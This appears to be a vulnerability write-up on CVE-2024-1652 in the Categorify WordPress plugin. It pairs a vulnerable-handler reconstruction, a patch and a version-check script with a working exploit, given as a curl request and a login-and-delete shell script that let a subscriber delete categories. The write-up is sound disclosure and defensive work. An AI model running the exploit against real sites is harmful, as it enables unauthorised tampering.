In February 2024 (see the timeline at the end of this post), CVE-2024-1652 was disclosed: a missing-authorization vulnerability in the Categorify plugin for WordPress. Every version up to and including 1.0.7.4 lets even the lowest-privilege users, such as regular subscribers, clear categories from a site. In this deep dive I’ll show how the bug works, walk through how it can be exploited, help you tell whether you’re affected, and point to the best references for more details.
The Root of the Problem
In WordPress, plugins often use special AJAX actions to let users do stuff behind the scenes—like changing settings or updating posts—without reloading the page. Developers are supposed to wrap these actions with capability checks so that only trusted users can make changes.
The Categorify plugin registers an AJAX handler called categorifyAjaxClearCategory, but the handler never checks the caller’s capabilities. Because admin-ajax.php runs wp_ajax_* actions for any authenticated user, *any logged-in user* can reach this code, including ordinary subscribers.
The upshot? Attackers can send a simple request and clear out your categories—disrupting navigation and leaving sites in a mess.
Here is a simplified reconstruction of the pattern (not the plugin’s exact source):
// Inside categorify.php:
add_action('wp_ajax_categorify_clear_category', 'categorifyAjaxClearCategory');

function categorifyAjaxClearCategory() {
    // MISSING: capability check such as current_user_can('manage_categories')
    // MISSING: nonce check such as check_ajax_referer()
    $cat_id = intval($_POST['cat_id']);
    wp_delete_category($cat_id);
    wp_send_json_success('Category cleared');
}
Here, there’s no check to see if the current user should be allowed to delete categories!
How To Exploit It
1. Log in as a low-level user
First, register or log in as a subscriber on the target WordPress site.
2. Find a category to delete
Find a category ID. Category archive links on the site often carry it (?cat=ID), the public REST endpoint /wp-json/wp/v2/categories lists every category with its id, or you can simply guess (1 is “Uncategorized” on a default install).
3. Send the AJAX request
Using your browser’s dev tools, Postman or curl, send a POST request to this URL:
https://victim.com/wp-admin/admin-ajax.php
with two form fields:
action: categorify_clear_category (the AJAX action name from the simplified code above)
cat_id: the category ID you want to clear
Include your session cookies (the wordpress_logged_in_* cookie) so WordPress treats you as authenticated. Without them admin-ajax.php answers with a bare 0, because no wp_ajax_nopriv_ handler exists for this action.
Example using curl
curl 'https://victim.com/wp-admin/admin-ajax.php' \
-b 'wordpress_logged_in_[hash]=[your_cookie]' \
-d 'action=categorify_clear_category&cat_id=1'
If it works, the response is the plugin’s JSON success message and the chosen category is gone. That’s it!
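The three steps above as one script, added here as an example; it is not code from the Categorify plugin or from the original advisory. It assumes the action name categorify_clear_category and the cat_id field from the simplified reconstruction earlier in this post, that curl is installed, and that the target is a site you are authorised to test. The classify_response helper is the part worth keeping: it tells a real clear apart from a patched handler, a missing session and a failed nonce check.

```sh
# Added example: drive the exploit end to end. Assumes the simplified action
# and parameter names from this post; test only against your own site.
set -eu

# Classify the body admin-ajax.php sends back. wp_send_json_success() gives
# {"success":true,...}; wp_send_json_error() gives {"success":false,...};
# WordPress itself answers "0" when no handler ran (not logged in, plugin
# inactive, or wrong action name) and "-1" when check_ajax_referer() fails.
classify_response() {
  case "$1" in
    0)                    echo 'no-handler' ;;
    -1)                   echo 'bad-nonce'  ;;
    *'"success":true'*)   echo 'cleared'    ;;
    *'"success":false'*)  echo 'rejected'   ;;
    *)                    echo 'unknown'    ;;
  esac
}

# Step 1: log in as the low-privilege user and keep the session in a cookie
# jar. The initial GET picks up wordpress_test_cookie, which the login form
# expects to see when it is posted back with testcookie=1.
wp_login() { # base_url user pass cookie_jar
  curl -sS -o /dev/null -c "$4" -b "$4" "$1/wp-login.php"
  curl -sS -o /dev/null -c "$4" -b "$4" \
    --data-urlencode "log=$2" --data-urlencode "pwd=$3" \
    -d 'wp-submit=Log+In' -d 'testcookie=1' "$1/wp-login.php"
  # A successful login leaves a wordpress_logged_in_<hash> cookie in the jar.
  grep -q 'wordpress_logged_in_' "$4"
}

# Step 3: fire the AJAX action with the session cookies (step 2 supplies the ID).
clear_category() { # base_url cookie_jar cat_id
  curl -sS -b "$2" -d 'action=categorify_clear_category' \
    --data-urlencode "cat_id=$3" "$1/wp-admin/admin-ajax.php"
}

# Usage: TARGET=https://example.test WP_USER=sub WP_PASS=secret CAT_ID=1 sh clear.sh
# With no TARGET set, only the functions are defined.
if [ -n "${TARGET:-}" ]; then
  jar=$(mktemp)
  trap 'rm -f "$jar"' EXIT
  wp_login "$TARGET" "${WP_USER:?}" "${WP_PASS:?}" "$jar" || { echo 'login failed' >&2; exit 1; }
  body=$(clear_category "$TARGET" "$jar" "${CAT_ID:-1}")
  printf '%s -> %s\n' "$(classify_response "$body")" "$body"
fi
```

A "rejected" result means the handler ran but refused you, which is what a site that already carries the capability check returns; "no-handler" usually means your cookies did not make it into the request.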
Is My Site Vulnerable?
If you run Categorify at version 1.0.7.4 or earlier, any subscriber on your site can clear categories right now. The installed version is shown on the Plugins screen in wp-admin and in the Version: header of the plugin’s main file.
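To check an install from the command line, here is an added example (not code from the plugin or the advisory) that reads the version out of the plugin header and compares it with the last affected release. It assumes the plugin’s main file is wp-content/plugins/categorify/categorify.php (the file name quoted above, under the WordPress.org slug categorify) and that 1.0.7.4 is the last vulnerable version, as this post states.

```sh
# Added example: is the local Categorify at or below the affected version?
# Assumes the path and the 1.0.7.4 threshold described in this post.
set -eu

LAST_VULNERABLE='1.0.7.4'

# Compare two dotted numeric versions field by field; prints -1, 0 or 1.
# Missing trailing fields count as 0, so 1.0.7 equals 1.0.7.0. Non-numeric
# fields (e.g. "5beta") are not handled.
version_cmp() {
  a=$1; b=$2
  while [ -n "$a" ] || [ -n "$b" ]; do
    x=${a%%.*}; y=${b%%.*}
    case $a in *.*) a=${a#*.} ;; *) a='' ;; esac
    case $b in *.*) b=${b#*.} ;; *) b='' ;; esac
    if [ "${x:-0}" -lt "${y:-0}" ]; then printf '%s\n' -1; return; fi
    if [ "${x:-0}" -gt "${y:-0}" ]; then printf '%s\n' 1; return; fi
  done
  printf '%s\n' 0
}

# True (exit 0) when the given version is at or below LAST_VULNERABLE.
is_vulnerable() {
  [ "$(version_cmp "$1" "$LAST_VULNERABLE")" -le 0 ]
}

# Pull "Version: x.y.z" out of a plugin main file's header comment.
installed_version() { # path to plugin main file
  sed -n 's/^[[:space:]*]*Version:[[:space:]]*\([0-9][0-9.]*\).*/\1/p' "$1" | head -n 1
}

main() { # path to plugin main file
  file=$1
  [ -r "$file" ] || { echo "cannot read $file" >&2; return 2; }
  v=$(installed_version "$file")
  [ -n "$v" ] || { echo "no Version header in $file" >&2; return 2; }
  if is_vulnerable "$v"; then
    echo "Categorify $v is affected (<= $LAST_VULNERABLE): update it"
    return 1
  fi
  echo "Categorify $v is past $LAST_VULNERABLE"
}

# Usage: sh check.sh /var/www/html/wp-content/plugins/categorify/categorify.php
# Exit status 1 means vulnerable, so it can gate a deploy script. On a host
# with WP-CLI the version is also one command away:
#   wp plugin get categorify --field=version
if [ -n "${1:-}" ]; then main "$1"; fi
```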
How To Fix
1. Update the plugin: check Categorify’s changelog for a fixed version (if available) and install it.
2. Add a manual capability check (if you must patch yourself). Edits to plugin files are overwritten by the next update, so treat this as a stopgap; a must-use plugin that hooks the same wp_ajax_ action at an earlier priority and calls wp_die() for unauthorized users survives updates. The patched function looks like this:
function categorifyAjaxClearCategory() {
    // Authorization: only users who may manage categories get past this line.
    if ( ! current_user_can( 'manage_categories' ) ) {
        wp_send_json_error( 'Unauthorized', 403 ); // sends JSON and exits
    }
    // If the plugin's JavaScript sends a nonce, also verify it here with check_ajax_referer().
    $cat_id = isset( $_POST['cat_id'] ) ? absint( $_POST['cat_id'] ) : 0;
    if ( ! $cat_id ) {
        wp_send_json_error( 'Missing cat_id', 400 );
    }
    // wp_delete_category() returns true on success, false for an unknown term,
    // 0 for the default category and WP_Error on failure.
    $result = wp_delete_category( $cat_id );
    if ( is_wp_error( $result ) || ! $result ) {
        wp_send_json_error( 'Category could not be cleared', 500 );
    }
    wp_send_json_success( 'Category cleared' );
}
References
- Official Categorify Plugin on WordPress.org
- Wordfence Advisory
- WPScan Vulnerability Database Entry
- Understanding capabilities in WordPress
Conclusion
CVE-2024-1652 demonstrates how a missing security check can have a big impact—even turning normal users into accidental (or intentional) attackers. If you use Categorify, update fast, and remember: *never trust user input, and never forget capability checks in your plugins.*
Timeline
Published on: 02/27/2024 11:15:08 UTC
Last modified on: 02/27/2024 14:19:41 UTC